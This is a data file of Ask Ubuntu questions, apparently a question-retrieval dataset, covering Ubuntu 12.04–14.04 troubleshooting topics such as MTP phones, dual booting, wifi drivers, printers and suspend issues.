463015	ubuntu 14.04 and android , ca n't see phone on my computer	i have installed gmtp and tried to follow this tutorial to solve this problem : http : //www.webupd8.org/2013/01/upgrade-to-gvfs-with-mtp-support-in.html but neither worked . i tried to connect both my phone ( nexus 4 ) and my dad 's phone ( galaxy note 2 ) , and neither is being detected by ubuntu . they do n't show up on my files and on gmtp . is there another fix ? or something more specific for android 4.3 and ubuntu 14.04
463017	problems detecting android tablet iview 788tpc with mtp-tools	i installed mtp-tools on 14.04 `` trusty '' through software center . no problems with install . issuing `mtp-detect' results in 'unable to open ~/.mtpz-data for reading , mtpz disabled.libmtp version : 1.1.6 listing raw device ( s ) no raw devices found . ' i did some research and found that mtpfs might be required . so installed that with : ~ $ sudo apt-get install mtpfs i still get the following result : ~ $ mtp-detect unable to open ~/.mtpz-data for reading , mtpz disabled.libmtp version : 1.1.6 listing raw device ( s ) no raw devices found . my research indicates that the mtp-tools package is still under development . source : http : //libmtp.sourceforge.net/ and the documentation is not comprehensive . source man mtp-tools as well as mtp-detect -h i tried adding the ppa from are there any plans to improve mtp support on future ubuntu releases ? but it seems this is already worked into trusty 14.04 and wo n't resolve the problem . can anyone provide a recommended course of action to resolve this problem ?
463018	how do i recover windows from a lost partition ?	i installed ubuntu 14.04 on my laptop , which previously ran windows vista , i meant to run them side by side so i could boot between the two . when i got to that point in the installer it told me vista was installed but left no option to install alongside so i clicked `` something else '' . it took me to the partitioning window and i clicked new partition window ( cause i did n't think to actually find out what it did ) i went further with the install and now i 'm running solely ubuntu . is there any way to recover my previous windows with files ? or at least transfer the files to ubuntu ? if so could you please give me detailed instructions instead of just use said program ( linux is brand new to me ) my hdd : outcome of terminal :
463019	installing ubuntu 14.04 on hp pavillion issues	for the past couple of days i 've been trying to install ubuntu on my laptop so it can dual-boot alongside windows 7 . i have windows 7 pre-installed with the laptop . firstly i downloaded the iso file and i installed it on the usb using the instructions on the ubuntu website . i put the usb in the laptop and then when i restarted it successfully boots and give me a black screen with 4 options the first is to try ubuntu and the second is to install directly . for the case which i choose try ubuntu and then choose to install ubuntu via there , the issue is that it tells me during the installation `` this computer currently has no detected os . what would you like to do ? '' and the options are to erease disk and install ubuntu or something else . when i choose something else it gives me 4 partitions . sda1 , sda2 , sda3 , sda4 . i did n't know what to do from there . i tried something else , when the computer restarts i actually pressed f9 and i chose the booting . there were a number of options , but the weird thing is there was the name of the usb that has ubuntu on it , and the same exact name but with [ uefi ] beside it . when i choose to boot without the uefi , it took me directly to a menu where i choose to try ubuntu or install ubuntu , using this way , it gives me another option during the installation which is install inside windows 7 , when i choose it , the computer just restarts . i have uefi off and legacy on from the settings . after googling and going through various forums , i thought the problem would be because hp laptops come pre installed with 4 partitions . i have actually deleted hp tools partition and it did n't do anything . same behavior during the installation . i tried to shrink my c driver and i left 40gb of unallocated space using the windows disk management tool , but it also did n't do anything . i am out of ideas and out of hope ! i tried lots and lots of tutorials on youtube and forums but nothing helped me . thank you so much for reading this and any help would be so much appreciated !
463024	how can i get the source code of the sound drivers in ubuntu ?	i have dual boot windows and ubuntu . ubuntu can correctly detect and play my ess 1969 sound card . so , i was thinking of the source code of ubuntu driver so that i can compile and run it on my windows 7 for sound ?
463025	problem with resolv.conf	i made these changes to resolv.conf today and when i restarted my laptop i can not connect to the internet . it says server cant be found . these commands were given to me by unodns when trying to delete it from my system . sudo mv /etc/resolv.conf /etc/resolv.conf.bak echo `` nameserver 8.8.8.8 '' | sudo tee /etc/resolv.conf echo `` nameserver 8.8.4.4 '' | sudo tee -a /etc/resolv.conf any suggestions as to what went wrong . i am using ubuntu 14.04 lts .
463029	maas 1.4 juju deployed nodes wo n't install	i have maas working fine with several nodes commissioned . i am trying to bootstrap juju using a precise image however the node gets stuck right after network detection . if i use saucy image it works fine . the problem is most of the juju charms are using precise so i ca n't get them to deploy .
463030	wireless not connecting/dropping connection	i 've searched around and nothing seems to be up to date . i installed ubuntu 14.04 alongside windows 7 on a toshiba satellite s50 . my wifi detects the network , but keeps asking for a password and saying `` you have been disconnected '' . my wifi device is a realtek rtl8188ee wireless network adapter , for which none of the drivers i 've downloaded have been able to compile on the newer kernel . i tried plugging in a cheap usb wifi dongle , and i was able to connect , however my connection seemed to drop out every few minutes and not come back until i reseated the wifi dongle . any help is appreciated .
463033	is it possible to use irc chat on new empathy ?	i ca n't find any option to add irc acount on the online accounts service .
463044	zte blade iii pro - android phone	i have zte blade iii pro android smartphone , with 1.2 ghz dual core processor and android 4.1.2 os , but i want to try ubuntu touch , can anybody tell me is it possible to install ubuntu on this phone and if so , can anybody help me thought the process of installation . the phone is rooted and have 4 gb internal memory and 16gb microsd class10 card .
463046	should i edit sources.list* ?	i 've recently updated to ubuntu 14.04 , which is also when i started using the nvidia 331 proprietary driver . when installing updates , i would get prompted with the 'not all updates can be installed ' message . because i did n't know whether it shows up because of the distribution upgrade or the nvidia driver , i search around for a bit . i found a potential solution using : sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade however , i also learned about /etc/apt/sources.list . i had a look inside mines and found mostly saucy and raring sources inside sources.list.distupgrade , and one non-trusty source inside the main main sources.list : # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner so my questions are : what is the purpose of sources.list.save and sources.list.distupgrade ? should i remove/modify them ? should i remove the raring source in sources.list ? thank you in advance !
463052	junos pulse workaround ?	my institution recently switched from using juniper network connect to junos pulse . under network connect there is a series of solutions for connecting to vpns from linux using network connect , but there seems to be no equivalent set of instructions for connecting to systems that only offer junos pulse . so , i have 2 questions , either i 'd be happy having answered : are there any solutions for connecting to junos pulse-only vpns ? if not , does anyone have any advice for creating one , perhaps in light of the fact that there is an android app for connecting to pulse vpns ?
463053	how do i remove ubuntu 12.04 ?	my system runs vista , i have installed 12.04 to run in parrallel . i should be able to choose to run vista or ubuntu but it will not let me . none of my windows programs will load from disc . all i can get is progs from the internet . i can get to my youtube account but it will not play the sound .
463055	problem with booting into ubuntu 12.04 lts	i am having an issue with the booting of ubuntu 12.04 lts . i tried using the boot repair through the live cd and it failed to resolve the issue . now , i am unable to boot in ubuntu . here is the problem : http : //paste.ubuntu.com/7418000 w : duplicate sources.list entry cdrom : //ubuntu 12.04.4 lts _precise pangolin_ - release amd64 ( 20140204 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.4 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20140204 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04.4 lts _precise pangolin_ - release amd64 ( 20140204 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.4 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20140204 ) _dists_precise_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems dpkg-preconfigure : unable to re-open stdin : no such file or directory how can this be fixed ?
463057	mobile broadband with telecom e3531 t窶全tick	i 'm planning on getting mobile broadband on ubuntu 12.04 with this device . problem is , i 've been told by customer services that it only works on windows xp , vista , 7 , 8 and mac . if i install wine , would it then be possible to use mobile broadband with the device ?
463064	rhythm box cuts out !	so i installed ubuntu `` trusty tahr '' today works like a charm but my only problem is the rhythm box thing works ok but the music cuts out and it happens like 4~5 times a song and it is basically like the song pauses and plays instantly and it does n't please me in music playing so if there is any other music players better than rhythm box player i would gladly use it
463065	will ubuntu be ok after formatting windows 7 ?	i currently have two partitions on one hard drive . windows 7 is installed on partition c , and ubuntu is installed on partition d. i wish to format the windows partition and replace windows 7 with windows 8.1 . ubuntu was n't installed with wubi . will ubuntu be ok ?
463067	hp p1005 laserjet problem in lubuntu 12.10	i have manually installed hp p1005 laserjet in my pc and it has been functioning very well . the other day when switched on my pc a message on the desktop asked me to upgrade software for the printer . so i did , unfortenately . after that i can not print graphical barcodes , printing text is no problem . where the barcode should be , the paper is blank . i am not willing to manually reinstall my laserjet again . using synaptic i have reinstalled all software for the printer , but no luck - what to do ?
463068	writing to an usb optical mouse	on the internet i find a lot of examples of people reading from the /dev/input/mousex device the dx , dy and status byte from an usb optical mouse . from some research i found out that such an usb optical mouse can be reset , the streaming frequency can be set etc . all by sending some control codes to the mouse . to which linux device ( /dev/ ... ) should i write these control codes after which i can listen to the /dev/input/mousex for the answer ? i could not find any concrete info on the internet . what i saw was that there exist a so-called hidraw device but no explanation about how to us it . from the desktop it is possible to change the settings of the parameters of the optical mouse , so there must be a possibility to write to it . a lot of verification about udev , udevadm and lsusb in order to detect device and bus parameters of the mouse and the input device to which it is connected , but no clear info about the output channel . i would appreciate very much to get in contact with who can help me ! regards
463074	ubuntu 14.04 brother mfc-j825dw fails to print	i have searched online via google , youtube and brother website but i was unable to find a solution . i have an acer aspire v3-571 laptop , dual booted with windows 7 home premium and ubuntu 14.04 . i have j825 set up wireless . laptop is set up wireless . both are on my home lan , along with brother-hl-2270dw via usb to dell e510 with windows 7 professional . i have a netgear router wgr614v10 with wired ethernet connection to e510 and voip and isp provider . query of ubuntu shows correct printer destination , printer accepting jobs . led on j825 indicates `` receiving data '' but fails to print . $ lpstat -t scheduler is running system default destination : brother-mfc-j825dw : dnssd : //brother % 20mfc-j825dw._ipp._tcp.local/ brother-mpc-j825dw accepting requests since thju 08 may 2014 01:14:11 am edt printer brother-mfc-j825dw is idle . enabled since thu 08 may 2014 1:14:11 am edt i am brand new to linux & ubuntu please advise .
463075	create a virtual machine and connect to it command line	i 'm running an ubuntu 14.04 server , and would like it to also run another 14.04 server instance in a vm on it . ( i need to use two vpns on the same machine simultaneously ) i 've tried using both kvm and virtual box , but i was never able to figure out how to ssh into the server once it was running . almost all of the tutorials i 've found use the gui tools or tell you how to create a vm in the command line and then tell you to vnc into it . any ideas ?
463076	partitions disappeared after power loss while installing	i had ubuntu 14.04 lts installed on my laptop . after a while i had some troubles starting it up . i decided to reinstall ubuntu . i had 3 ntfs partitions , 2 ext3 partitions the mount point for the first was / and for the second was ./local and a swap partition . during the reinstallation i chose the option : `` erase ubuntu 14.04 and reinstall '' . during the reinstallation the power cut off . after it worked again i turned my laptop on to try to restart the installation process . i could n't find any options other than : erase disk and install ubuntu something else when i chose something else i could n't see my partitions . instead i found this : device type mount point format ? size used system /dev/mapper/ubuntu -- vg-root /dev/mapper/ubuntu -- vg-root ext4 631381 mb unknown linux device-mapper ( linear ) ( 631.4 gb ) /dev/mapper/ubuntu-vg-swap_1 /dev/mapper/ubuntu-vg-swap_1 swap 8493 mb unknown /dev/sda /dev/sda1 ext2 254 mb 27 mb /dev/sda5 639877 mb unknown at the testdisk phase i have this :
463077	windows 7 dual-boot linux	i have a windows 7 and i want to install ubuntu . if i choose the option to install alongside with windows 7 , where 's ubuntu going to be installed . is it going to be at my c : ( system partition ) or somewhere else ? p.s i have two partiotions c : system and d : data ( music , etc ... )
463079	want to write command in terminal and open application	i just installed matlab on my ubuntu 14.04 and i can open it just with terminal writing full path , but i want to open terminal and write only `` matlab '' to start that program without writing full path . thanks
463081	booting from a usb	i 'm trying to boot from a usb . i downloaded the iso file to the usb , but i ca n't seem to get it installed on my computer . what should i do from here ? ?
463086	boot from within windows	i 'm trying to follow these instructions on using qemu to boot linux from within windows . i downloaded ubuntu-14.04-desktop-amd64.iso from this site , but it does n't seem to run . i have an intel 64-bit processor ( the i5 - 3570 ) and i just noticed the file is for amd ? but it was recommended to get a 64-bit processor .
463087	strange issue with dhcp on ubuntu 12.10	i 've configured a new ubuntu dhcp server ( 12.10 ) and it 's working fine ( thanks to you all for all you help in setting it up ) . i have a strange issue , and do n't know what 's going on . i hope i will get a solution or an explanation . the server has 2 network cards eth0 and eth1 , eth0 is connected to the router and provides internet access . the settings are as follows : iface eth1 inet static address 10.0.19.121 netmask 255.255.255.0 network 10.0.19.0 gateway 10.0.19.5 dns-nameservers xx.xx.xx.xx xx.xx.xx.xx the setting for eth1 ( provides ip addresses ) : iface eth0 inet static address 172.20.32.2 netmask 255.255.224.0 // ( need only about 8000 ips ) broadcast 172.20.63.255 network 172.20.32.0 dhcp settings are : default-lease-time 691200 ( need it like that at the moment ) max-lease-time 864000 subnet 172.20.32.0 netmask 255.255224.0 range 172.20.32.10 172.20.63.250 ** # option broadcast-address 172.20.63.255 /// as comment //** option routers 10.0.19.121 option domain-name-servers xxx.xxx.xxx.xxx i 've installed and configured the forwarding/routing between eth0 and eth1 . it works great with the setting above ( just tested it on 6 devices ) . the devices get ip addresses and can access the internet . but if i uncomment the line # option broadcast-address 172.20.63.255 then none of the devices receives ip addresses and of course no internet access . what 's is wrong with this configuration ? is it ok if i leave it as it is ?
463088	mounting `` swap '' partition containing my old windows files	before upgrading to this wonderful ubuntu os , i had windows 8.1 with 2 partitions ( one for the os and one for my data ) . i made myself a bootable usb using ubuntu 's instructions , plugged it in and installed it - formating and replacing just the windows partition - . everything fine and dandy until the first restart . before restarting i had access to the partition i did not format when installing ubuntu ( the data files , pics , movies , projects ) . now after an hour or so in which i found out what terminal is facepalm , i ended up , as you can see in the screenshot below , with an overview of my situation . i think i still have my files , but i ca n't reach them . http : //i.stack.imgur.com/5hoiy.png if someone would kindly guide through what i have to do , i would be most grateful . kind regards , paul .
463091	can not select content on dvd in acidrip	i am using acidrip 0 . 14 and lubuntu 14 . 04 . typed in '/dev/sr0 ' in the video source path field and at the bottom left corner it says 'dvd read ok ' but nothing shows up in the large window under the path . what are the correct pieces that have to be in place first in order for acidrip to function ? why does content not appear in the large window under the path field ? acidrip did work under lubuntu 13 . 10 the one time i used it but not under 14 . 04 .
463092	terminal blank when opening	hello ubuntucommunity ! so i just recently formatted my laptop from windows 7 to ubuntu 14.04 lts and started playing around with it a bit . since it 's my second pc that i can use , i thought i could got all crazy with it , so i did . this is why i have now the gnome shell , along with some ubuntu-tweaks and gnome-tweaks to make it look like some sort of osx . now i built the new atom.io yesterday and after i had done so , i thought that the background of my terminal was not fitting , so i changed the color of the background and the font to black on white . anyhow now , each time when i open a new terminal window , i see no commands or something like the usual ; user @ computer : ~ $ if i press strg+c it appears and i can type commands just as usual . is there any way to fix this ? thank all of you guys in advance !
463093	ubuntu cpu load	i 'm new to linux world and i have a problem with my fresh installation of ubuntu 14.10 64-bit . my processor is intelâž pentium ( r ) d cpu 2.80ghz ă 2 with 4 gb of ram and geforce 8600 gt/pcie/sse2 . when i use pc cpu load is always above 0.90 . i found these questions but no luck at all with finding solution : high cpu usage even when no application is running ( desktop ) any way to check the clock speed of my processor ? and more in google in terminal top xorg and compiz are always first . for example while i 'm moving firefox window both go around 60 % of cpu or when i open the search menu and typing random stuff . in unity tweak tool texture quality is on fast and all animations are disabled + blur under search windows is turned off , installing unity 2d does n't work . i 'm using the nvidia binary driver 331.38 and changing workspaces is very smooth just like scrolling pages is firefox . also i disabled the hardware acceleration in firefox and some of the plugins . i have right now turn on adblock plus and flash - block . i 'm not sure but this can help : sudo dmidecode -t processor | grep speed max speed : 4000 mhz current speed : 2800 mhz also done this . copy and paste , or type , the following lines at the bottom of the screen section : option `` renderaccel '' `` true '' option `` disableglxrootclipping '' `` true '' option `` damageevents '' `` true '' option `` useevents '' `` true '' then i had to recover the xorg default settings , when i restarted pc window show up with something like : you are running low graphics mode but i fixed it so all is ok right now . it 's 5th day and i 'm stuck , so i 'm begging for help . also i installed xfce ( xubuntu 14.10 ) and lxde ( lubuntu 14.10 ) but i like unity much more . on ubuntu 14.10 32-bit is even worse + here is my top when pc on idle , all look good : load average : 0.11 , 0.21 , 0.29 but pc is for work not idle . so finally my question : is it normal ? if not how can i fix my cpu usage ? why is xorg and compiz so resource hungry ?
463102	how to schedule a command to run a few seconds after startup ?	i was trying to use @ reboot /my/script in cron to run a script on a 10.04.4 vm running in vmware fusion top print ifconfig to a file on a shared directory , which is /mnt/hgfs/somedir . it did n't work because hgfs is not mounted yet as a remote directory when the system starts . is it possible to do something like @ reboot +10s to run the cron job 10 sec after the system starts , when i can realistically expect to have that remote directory mounted on the system ?
463112	netbooted ubuntu does n't shutdown cleanly ?	i 've managed to customise initramfs-tools to netboot a ceph rbd disk . first i managed to netboot a debootstrapped system . that worked well . but the moment i installed ubuntu-desktop package ( as i need to use cuda on the gpu 's ) it has some problems . some i 've resolved . the thing that i really need resolved though is that during the shutdown process it hangs . i suspect that the shutdown process is killing the network before the rest but i 'm not sure really . i notice that in init , networking.conf contains stop on unmounted-remote-filesystems looking further i see that rc.conf emits unmounted-remote-filesystems and that when the runlevel is 0 , 1 or 6 it will initiate plymouth-shutdown . the thing is , installing ubuntu-desktop is what brought in plymouth . i get a whole screen full of errors when booting about plymouth which are : plymouth-upstart-bridge main process terminated with status 1 my guess is that nfs booting would have similar issues . but i do n't see any mention of shutdown problems with nfs or mentioned here : https : //help.ubuntu.com/community/disklessubuntuhowto any ideas ?
463115	ubuntu 14.04 stopped recognizing my wifi mid-stream	my wifi network is not recognized by ubuntu . it always has before , and it happened while streaming a radio show it had been playing for over an hour . all other nearby networks are listed , and a wifi analysis off my phone shows my network signal strong and clean . all other devices i have see the network just fine . trying to log on using `` hidden network '' ( although it is n't ) shows my ssid from history but fails to connect from there either . it is as if someone had suddenly unplugged the wifi . rebooted , but my network is still not listed . -- -- -- -- -- -wlan0 link encap : ethernet hwaddr 70:1a:04 : d9 : ec : f4 up broadcast multicast mtu:1500 metric:1 rx packets:3 errors:0 dropped:0 overruns:0 frame:0 tx packets:39 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:896 ( 896.0 b ) tx bytes:8818 ( 8.8 kb ) thanks guys !
463116	rsyslog for beginners	i 've just started to use rsyslog on an ubuntu 14 server . i am using it as a server to send logs from my firewalls / nas / routers etc . new to all this so could do with some advice . firstly , how to properly setup rsyslog to run as a server ? i have it working , receiving information from the other devices but is there a better way to set this up other than the default . what about storing it in a mysql database ? secondly , i am looking for a web interface to manage it all . preferably something clean , easy to use and realtime ( if thats possible ) i have had a look at logzilla which looks perfect but is no longer free . so what would people recommend ? thanks
463118	how to move a program from a partition to another one ?	i 'm new to linux and ubuntu , so sorry in advance if this is a noob question , but i do n't know how to solve this situation . i 've installed virtual box on ubuntu , and i 've also installed truecrypt ( that i had used to create an hidden encrypted volume on the hard disk ) . now , i want to move the program virtualbox ( that is installed on the partition not encrypted of the hard disk ) to the partition encrypted with truecrypt ( the hidden volume ) . i 've searched for the vitual box folder or similar , where is installed the program , but is not like in windows or osx where you only have to find the program and then you can move it wherever you want ; in fact there is not just a folder for the program , but more than one . ( for example i have in usr/bin these files : vbox , vboxautostart , vboxballoonctrl , xbox headless , vboxmanage , vboxsdl , vboxtunctl , vboxvrdp and vboxwebsrv ; and then there is a folder called virtualbox in usr/lib ) . i do n't know , probably i have to move the folder that is usr/lib to the encrypted partition , or not ? thanks in advance for any answer : )
463121	problems running higher resolution	when i plug my hdmi into my tv it runs the same resolution as my laptop . if i try to run at a higher resolution it does n't fit on the screen . other information graphics card intel 4000hd xrandr command output screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 lvds1 connected ( normal left inverted right x axis y axis ) 1366x768 60.0 + 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 1600mm x 900mm 1920x1080 60.0*+ 60.0 50.0 59.9 30.0 25.0 24.0 30.0 24.0 1920x1080i 60.1 60.1 50.0 60.0 1280x1024 60.0 1360x768 60.0 1280x720 60.0 60.0 50.0 59.9 1024x768 60.0 1440x480i 60.1 60.1 800x600 60.3 720x576 50.0 720x480 60.0 59.9 640x480 60.0 59.9 59.9 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) is there any way to fix this ?
463122	kvm switch under ubuntu 14.04	i 'm trying to install a kvm switch between two computer . the first one runs under windows xp . the mouse/keyboard/screen works perfectly ( the first computer is an acer aspire ( lifestyle line ) ) . when i switch to the second computer ( dell optiplex 745 with ubuntu 14.04 ) the screen switch , but the usb wireless keyboard/mouse stop working . i can access and navigate the bios with the kb/m connected to the switch . when i plug the usb directly ( without the kvm switch ) it works perfectly . also , the screen is a flatron l1510s ( touch screen ) , it has a ps/2 plug that controls the mouse ( it 's connected directly to the first computer as it 's the only one that needs touch screen ) everything is usb except for that wire . i think the problem comes from the os but i ca n't seem to figure out why . all the usb ports work perfectly except for when the source is the switch . anybody had a similar problem before ? thank you for your help !
463129	localhost links have stopped working in xampp ?	i have an xampp installation on ubuntu 14.04 and its been working great ever since i installed it under 13.10 , up until today . i was going to check something in my mysql database via phpmyadmin through the xampp page , which i normally access via localhost . however , i went to do this today , and i just get a page that looks like this : if i access phpmyadmin via localhost/phpmyadmin it pulls up just fine . however , none of my projects ( all with index.html files in sub-folders ) appear , or even the default index.html page . i added an index.html file to /var/www/html ( i had read this question regarding the new apache version in 14.04 ) and it displayed that page . i also noticed that if i run the command sudo /opt/lampp/xampp start it says this : starting xampp for linux 1.8.3-3 ... xampp : starting apache ... fail . < -- -- -- -- -- ! ! ! xampp : another web server is already running . < -- -- -- -- -- ! ! ! xampp : starting mysql ... already running . xampp : starting proftpd ... already running . which makes me think that the updated version of apache ( installed with 14.04 ) is interfering with xampp somehow . funny thing is , if i ftp in ( proftpd installed with xampp ) i can see all of my files like normal . i know that xampp stores its files in /opt/lampp/htdocs , and all of my files are still there , but i ca n't access them . i have googled all over the place for a fix , no one else seems to have run into this issue yet . is there a fix for this , or is xampp rendered useless with 14.04 ? edit : i installed xampp via the installer.run file from the apache friends website and i 'm running xampp 1.8.3-3 , as you could see . the version of apache is the default installed one for ubuntu 14.04 2.4.7-1ubuntu4 . configuration is default afaik , nothing changed around . i would agree with the comments in saying that it looks like i have another instance of apache installed , but i removed the lamp bundle software i had previously installed before i installed xampp via the .run installer . edit : apt-cache policy apache2 output , as suggested by braiam : apache2 : installed : 2.4.7-1ubuntu4 candidate : 2.4.7-1ubuntu4 version table : *** 2.4.7-1ubuntu4 0 500 http : //mirror.anl.gov/pub/ubuntu/ trusty/main i386 packages 100 /var/lib/dpkg/status
463136	keyboard backlight for fujitsu lifebook u810	i have recently acquired a fujitsu lifebook u810 , and set up a vista lubuntu dualboot . i do not need most of the fujitsu drivers , just the keyboard light . i am a linux noob and i could not figure out how to do this on tutorials for ubuntu ( would this affect it working ? ) . thank you .
463142	why x is relying on software instead of hardware with `` nomodeset '' kernel parameter for 3d acceleration ?	my laptop is an asus k55n with amd a8-4500m trinity apu and integrated radeon hd 7640g . yesterday i tried at least 8 live sessions from different distros ( slackware based , gentoo based , arch based , debian based , ubuntu based ) with the same results : backlight off after suspend . what i 've done so far that works better is to modify /etc/default/grub to : grub_cmd_line_default= '' nomodeset acpi_osi= '' my workaround works but only because xfce does not rely on 3d acceleration . if you try to change to a compositor that relies on 3d acceleration you 'll get into trouble with high temperatures . so , if you want to use a pretty and modern desktop like kde , gnome , cinnamon , unity or pantheon you are going to need 3d acceleration hence you ca n't use nomodeset hence you ca n't suspend . on the other hand , what i know about nomodeset is it should not kill 3d hardware acceleration after x kicks in . the question is : why x is relying on software instead of hardware with nomodeset kernel parameter for 3d acceleration ? more information at : bugs.launchpad.net
463149	ubuntu 14.04 and windows 7	my toshiba satellite p875-s7310 has the capacity for dual hard drives . i want windows 7 on one . and ubuntu 14.04 on my other hard drive . my question is in what order and how should i install these operating systems . i 've done a lot of researching but none of the scenarios match mine . the last thing i want to do is have to wipe my hard drives and restart the process after trial and error 50 times . please give me options and opinions as soon as possible .
463151	unable to erase second os	i have not found a way to destroy the second partition , lvm and add all the space to my ubuntu installation . i meant to install only ubuntu server on a single partition , instead , the installer chose to split my hard drive in two . i found a utility , os-uninstaller , but it is abandoned by the author an fails to work in latest ubuntu server lts . so how do i fix this from a command prompt ? i can not reinstall the box , for it is already in production .
463155	gnome-manual-duplex is not shown as a printer in ubuntu 14.04	gnome-manual-duplex is not shown as a printer in ubuntu 14.04 . therefore , i can not enjoy the same easy duplex printing as in ubuntu 12.10 that i used to have . i downloaded the .deb file from the sourceforge website . the app is working . however , there is no an associated virtual printer in the system that invokes the application . is there any reason why ubuntu 14.04 is different in this case ?
463156	dell inspiron wifi issues	i recently installed ubuntu 14.04 x64 onto a dell inspiron 1525 . first thing i always do when installing new os is being it up to speed to naturally i installed all updates before proceeding further . the issue i am facing is continious dropping/low wireless signal . i cant stream anything . this didnt happen when i was using 12.04 the inspiron is using an intel wifi adapter : description : wireless interface product : wireless 7260 vendor : intel corporation if someone could help me get my wireless working correctly , i would be very greatful
463159	force ppa package to satisfy distro meta-package dependency	i am building a package for my ppa that requires a newer implementation of libboost than what is provided in my target distro ( precise ) . i 've copied libboost1.55 from the boost ppa into my ppa . i 'm using pbuilder-dist to test my package build . i have successfully used the answer to this question to get pbuilder to get libboost packages from the ppa into the chroot environment . unfortunately , while all the dependencies can be installed from the ppa as libboost-libname1.55-dev , none of them satisfy the meta package libboost-libname-dev and the pbuilder-dist build fails due to unsatisfied dependencies . so , this question is not necessarily only tied to pbuilder-dist , but how would i either let pbuilder ignore the packages for dependencies ( as i 'm sure the dependency is met ) , or make apt-get consider the meta package dependency satisfied ? i would prefer not to mess with the debian/control unless there is no other way .
463160	system hangs after sleep	i am new to the linux world . i have a asus eee pc 1000ha with a 256gb ocz agility4 ssd . i loaded the newest version of kubuntu linux 3.13.0-24-generic kde sc version 4.12.97 . whenever the system goes into sleep mode , it processes to the lock screen and then a black screen . the power button flashes like it used to under windows . when i hit a key to resume , the screen either stays black and the cursor appears or the lock screen comes up . in either case the computer is hung . dmesg | grep 'ata2\|ata1' [ 1.610087 ] ata1 : sata max udma/133 cmd 0x1f0 ctl 0x3f6 bmdma 0xffa0 irq 14 [ 1.610095 ] ata2 : pata max udma/100 cmd 0x170 ctl 0x376 bmdma 0xffa8 irq 15 [ 1.780280 ] ata1.00 : force : horkage modified ( noncq ) [ 1.780394 ] ata1.00 : ata-9 : ocz-agility4 , 1.5.2 , max udma/133 [ 1.780403 ] ata1.00 : 500118192 sectors , multi 16 : lba48 ncq ( not used ) [ 1.788388 ] ata1.00 : configured for udma/133 i have tried these 3 changes in grub . grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux_default= '' quiet splash pcie_aspm=force '' grub_cmdline_linux_default= '' quiet splash libata.force=noncq '' i appreciate the help . thanks , ken
463162	force lock screen password input to not use japanese ibus ime	since i upgraded my 2 laptops from 13.10 to 14.04 , i sometimes have a problem entering password to exit lock screen : when typing in the password field of the lock screen , i see that the usual dark dots appear underlined , only for 3 characters typed only 1 or 2 dots appear . that 's a clear sign that japanese ime has decided to kick in . it does not happen everytime . i guess it is not a bug and some people really have passwords in japanese , but personally i find it totally annoying . how to disable japanese ime for the password field ? or just disable japanese ime when the lock screen appears .
463164	new 12.04.4 raid0 faulty install ; malformed gui & erratic mouse	update2 : # irc says 12.04.4 alternate not supported and quadro nvs 450 not well support . trying v14.04 now ( for raid0 & hopefully better gpu drivers ) ... update : reinstalled . no swap partitions . grub definitely went to usb stick . no errors reported during boot up . all is good except : gui & mouse still bonkers . ca n't figure it out . new install . hardware is tested . setup : 2x ssd . each ssd : 8gb swap partition 'primary ' + 120gb raid0 partition also 'primary' /boot assigned to usb stick , and hopefully mbr went there but not sure . boot gives errors but eventually does get to login . once logged in though , gui is messed - only desktop pic renders , all other elements are garbage blocks . mouse is mostly stuck in place , jitters around . totally unusable . is it my drive setup ? is the mbr on the 1st ssd and causing problems ? or is it something else altogether ? thanks gpu : nvidia nvs 450 displayport only . mobo : asrock x79 extreme6
463168	laptop screen black after suspend	i 'm a newer user to linux and am running into an issue with suspend on my laptop . i have a hp envy m6 with a amd a10-4600m apu with radeon hd graphics i 'm running ubuntu 14.04 lts the issue is that when i close the lid of my laptop , or manually attempt to put it in suspend , it will shutdown like normal . however , when i try to resume from that suspend my screen will remain dark . i 've looked around and seen several articles that have information about this , but nothing that directly relates to what i 'm experiencing . i 've tried a few of the other `` fixes '' and nothing has worked so far . any help that can be provided will be appreciated !
463170	sound not working on headphones , but works fine on laptop speakers	i have an asus k55a ds71 laptop and have reinstalled ubuntu 14.04 numerous times because of the sound going out in the headphones . the sound does work in the laptop speakers . i just reinstalled 14.04 , and the sound did n't work in the headphones from the start . when i open up the alsa mixer , i can turn up the headphone volume up all the way and it still wont work . i can boot into windows and the same headphones work perfectly . are there any fixes for this ? thanks for your help ! j
463172	shut down dialog box on login screen not giving any options	i recently upgraded to ubuntu 14.04 from 13.10 , and when i am logged in the shut down dialog box has the correct buttons that you can click - but from the login screen , there are no buttons to click . due to being new here , the screenshot is available separately :
463173	xmodmap alt+h == left key	i 'm new to ubuntu , on win32 i use autohotkey to do the key map , how to do this on ubuntu ? i tried the // ~/.xmodmap keysym alt_l = mode_switch keysym h = h h left keysym j = j j down keysym k = k k up keysym l = l l right then i use xmodmap ~/.xmodmap to make it work , the problem is all other key combination like alt+f2 ( run command ) are disabled . how to modify the script to make it work without affecting the default key combination ? and on win32 with ahk , each program could have their own key binding , eg : alt+h == left arrow for all applications except vim , vim has its own use of alt+h . is this possible with xmodmap or any other tool ? thanks .
463176	ca n't login after installing lxqt on 14.04	i am using lubuntu 14.04 . i read about lxqt , the next generation lightweight desktop environment , so i decided to try it . i added this ppa and then did apt-get update/upgrade and installed the lxqt-metapackage package . now when i try to login to lxqt desktop it just logs out instantly . i can login to the default lubuntu desktop as usual . how can i get this to work ?
